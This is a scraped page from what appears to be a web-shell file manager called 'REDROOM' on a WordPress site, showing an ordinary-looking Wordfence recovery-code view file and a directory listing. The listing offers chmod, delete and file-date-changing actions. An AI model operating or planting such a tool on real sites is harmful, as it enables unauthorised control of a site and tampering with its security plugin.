REDROOM
PHP 8.2.31
Path:
Logout
Edit File
Size: 5.84 KB
Close
/home/nshryvcy/blissfulnepal.com/wp-content/plugins/wordfence/modules/login-security/views/manage/regenerate.php
Text
Base64
<?php if (!defined('WORDFENCE_LS_VERSION')) { exit; } /** * @var \WP_User $user The user being edited. Required. * @var int $remaining The number of unused recovery codes. Required. */ ?> <div class="wfls-block wfls-always-active wfls-flex-item-full-width"> <div class="wfls-block-header wfls-block-header-border-bottom"> <div class="wfls-block-header-content"> <div class="wfls-block-title"> <strong><?php esc_html_e('Recovery Codes', 'wordfence'); ?></strong> </div> </div> </div> <div class="wfls-block-content wfls-padding-add-bottom"> <p id="wfls-recovery-code-count"><?php echo esc_html(sprintf(/* translators: count */ _n('%d unused recovery code remains. You may generate a new set by clicking below.', '%d unused recovery codes remain. You may generate a new set by clicking below.', $remaining, 'wordfence'), $remaining)); ?></p> <p class="wfls-center wfls-add-top"><a href="#" class="wfls-btn wfls-btn-default" id="wfls-recovery" target="_blank" rel="noopener noreferrer"><?php esc_html_e('Generate New Codes', 'wordfence'); ?></a></p> </div> </div> <div style="display: none;"> <?php echo \WordfenceLS\Model_View::create('common/modal-prompt', array( 'id' => 'wfls-template-recovery-prompt', 'title' => __('Generate New Recovery Codes', 'wordfence'), 'message' => __('Are you sure you want to generate new recovery codes? Any remaining unused codes will be disabled.', 'wordfence'), 'primaryButton' => array('class' => 'wfls-recovery-prompt-cancel', 'label' => __('Cancel', 'wordfence'), 'link' => '#'), 'secondaryButtons' => array(array('class' => 'wfls-recovery-prompt-confirm', 'label' => __('Generate', 'wordfence'), 'link' => '#')), ))->render(); ?> </div> <script type="application/javascript"> (function($) { $(function() { $('#wfls-recovery').on('click', function(e) { e.preventDefault(); e.stopPropagation(); var content = $("#wfls-template-recovery-prompt").clone().attr('id', null); WFLS.standaloneModalHTML(content, { onOpen: function(modal) { $(modal).find('.wfls-recovery-prompt-cancel').on('click', WFLS.closeStandaloneModal); $(modal).find('.wfls-recovery-prompt-confirm').on('click', function(e) { e.preventDefault(); e.stopPropagation(); var payload = { user: <?php echo (int) $user->ID; ?>, }; WFLS.ajax( 'wordfence_ls_regenerate', payload, function(response) { if (response.error) { WFLS.standaloneModal(<?php \WordfenceLS\Text\Model_JavaScript::echo_string_literal(__('Error Generating New Codes', 'wordfence')); ?>, response.error); } else if (response.recovery) { $('#wfls-recovery-code-count').text(response.text); var message = '<p><?php echo \WordfenceLS\Text\Model_JavaScript::esc_js(sprintf(/* translators: 1. Count; 2. length */ __('Use one of these %1$d codes to log in if you lose access to your authenticator device. Codes are %2$d characters long plus optional spaces. Each one may be used only once.', 'wordfence'), \WordfenceLS\Controller_Users::RECOVERY_CODE_COUNT, \WordfenceLS\Controller_Users::RECOVERY_CODE_SIZE * 2)); ?></p><ul class="wfls-recovery-codes">'; var recoveryCodeFileContents = '<?php echo \WordfenceLS\Text\Model_JavaScript::esc_js(sprintf(/* translators: 1. Site address; 2. Username */ __('Two-Factor Authentication Recovery Codes - %1$s (%2$s)', 'wordfence'), preg_replace('~^https?://~i', '', home_url()), $user->user_login)); ?>' + "\r\n"; recoveryCodeFileContents = recoveryCodeFileContents + "\r\n" + '<?php echo \WordfenceLS\Text\Model_JavaScript::esc_js(sprintf(/* translators: count */ __('Each line of %d letters and numbers is a single recovery code, with optional spaces for readability. To use a recovery code, after entering your username and password, enter the code like "1234 5678 90AB CDEF" at the 2FA prompt. If your site has a custom login prompt and does not show a 2FA prompt, you can use the single-step method by entering your password and the code together in the Password field, like "mypassword1234 5678 90AB CDEF". Your recovery codes are:', 'wordfence'), \WordfenceLS\Controller_Users::RECOVERY_CODE_SIZE * 2)); ?>' + "\r\n\r\n"; for (var i = 0; i < response.recovery.length; i++) { message = message + '<li>' + response.recovery[i] + '</li>'; recoveryCodeFileContents = recoveryCodeFileContents + response.recovery[i] + "\r\n"; } message = message + "</ul>"; message = message + "<p class=\"wfls-center\"><a href=\"#\" class=\"wfls-btn wfls-btn-default wfls-recovery-new-download\" target=\"_blank\" rel=\"noopener noreferrer\"><i class=\"dashicons dashicons-download\"></i> <?php echo \WordfenceLS\Text\Model_JavaScript::esc_js(__('Download', 'wordfence')); ?></a></p>"; WFLS.standaloneModal(<?php \WordfenceLS\Text\Model_JavaScript::echo_string_literal(__('New Recovery Codes', 'wordfence')); ?>, { html: message }, { onOpen: function(recoveryCodeModal) { $(recoveryCodeModal).find('.wfls-recovery-new-download').on('click', function(e) { e.preventDefault(); e.stopPropagation(); saveAs(new Blob([recoveryCodeFileContents], {type: "text/plain;charset=" + document.characterSet}), '<?php echo \WordfenceLS\Text\Model_JavaScript::esc_js(preg_replace('~^https?://~i', '', home_url()) . '_' . $user->user_login . '_recoverycodes.txt'); ?>'); }); } }); } }, function(error) { WFLS.standaloneModal('<?php echo \WordfenceLS\Text\Model_JavaScript::esc_js(__('Error Generating New Codes', 'wordfence')); ?>', '<?php echo \WordfenceLS\Text\Model_JavaScript::esc_js(__('An error was encountered while trying to generate new recovery codes. Please try again.', 'wordfence')); ?>'); } ); }); } }) }); }); })(jQuery); </script>
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 0 × Files: 5
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
activate.php
7.47 KB
lrw-r--r--
2026-06-03 14:57:34
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
code.php
1.63 KB
lrw-r--r--
2026-06-03 14:57:34
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
deactivate.php
3.28 KB
lrw-r--r--
2026-06-03 14:57:34
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
grace-period.php
2.25 KB
lrw-r--r--
2026-06-03 14:57:34
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
regenerate.php
5.84 KB
lrw-r--r--
2026-06-03 14:57:34
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).